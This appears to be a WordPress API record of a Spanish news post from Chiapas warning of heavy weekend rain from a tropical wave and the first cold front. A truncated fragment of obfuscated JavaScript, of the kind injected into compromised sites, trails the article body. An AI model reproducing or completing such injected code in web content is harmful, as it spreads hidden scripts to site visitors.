{"id":17693,"date":"2024-09-06T02:50:28","date_gmt":"2024-09-06T02:50:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17693"},"modified":"2024-09-06T02:50:29","modified_gmt":"2024-09-06T02:50:29","slug":"alertan-por-incremento-de-lluvias-el-fin-de-semana","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17693","title":{"rendered":"Alertan por incremento de lluvias el fin de semana"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"250\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725590922343.jpg\" alt=\"\" class=\"wp-image-17694\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725590922343.jpg 400w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725590922343-300x188.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>5 de septiembre del 2024. Tuxtla Guti\u00e9rrez.-El Centro Hidrometeorol\u00f3gico Regional &#8220;Tuxtla Guti\u00e9rrez\u201d, advirti\u00f3 por lluvias muy fuertes con puntuales intensas en Chiapas.<\/p>\n\n\n\n<p>El jueves y s\u00e1bado, debido al flujo de humedad proveniente de los oc\u00e9anos, una vaguada prefrontal en el Golfo de M\u00e9xico; el ingreso y desplazamiento de la onda tropical N\u00fam. 21 sobre y al sur de la regi\u00f3n, sumado al acercamiento de una zona de baja presi\u00f3n con potencial cicl\u00f3nico medio y la presencia del primer frente fr\u00edo de la temporada.<\/p>\n\n\n\n<p>Todo este asedio meteorol\u00f3gico generar\u00e1 puntuales intensas (75 a 150 mm), este jueves y viernes en las regiones Norte, Tulij\u00e1, Mezcalapa y Sierra; tormentas puntuales muy fuertes (50-75 mm) en Frailesca, Bosques, Altos, Maya, Metropolitana, Soconusco e Istmo &#8211; Costa; tormentas puntuales fuertes (25-50 mm) podr\u00e1n generarse en el resto de regiones.<\/p>\n\n\n\n<p>El viernes \u201cse espera el acercamiento del sistema frontal N\u00fam. 1 a la regi\u00f3n\u201d, junto el desplazamiento de la onda tropical 21 que tiene una ligera tendencia a desarrollarse como cicl\u00f3n; lo que propiciar\u00e1 el aumento de precipitaciones hacia el fin de semana.<\/p>\n\n\n\n<p>Condiciones de cielo medio nublado van a dominar, tambi\u00e9n se percibir\u00e1 un ambiente de c\u00e1lido a caluroso en la mayor parte de la regi\u00f3n, por cierto, al corte de la ma\u00f1ana del cuatro de septiembre, la temperatura m\u00e1xima se report\u00f3 en Pichucalco con 38.0 \u00b0C; y la lluvia que cay\u00f3 el martes en Tuxtla Guti\u00e9rrez fue de 67.4 mm, la tercera mayor registrada en el estado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 5 de septiembre del 2024. Tuxtla Guti\u00e9rrez.-El Centro Hidrometeorol\u00f3gico Regional &#8220;Tuxtla Guti\u00e9rrez\u201d, advirti\u00f3 por lluvias muy fuertes con puntuales intensas en Chiapas. El jueves y s\u00e1bado, debido al flujo de humedad proveniente de los oc\u00e9anos, una vaguada prefrontal en el Golfo de M\u00e9xico; el ingreso y desplazamiento de la onda tropical N\u00fam. 21 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17694,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17693","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17693","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17693"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17693\/revisions"}],"predecessor-version":[{"id":17695,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17693\/revisions\/17695"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17694"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17693"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17693"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17693"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}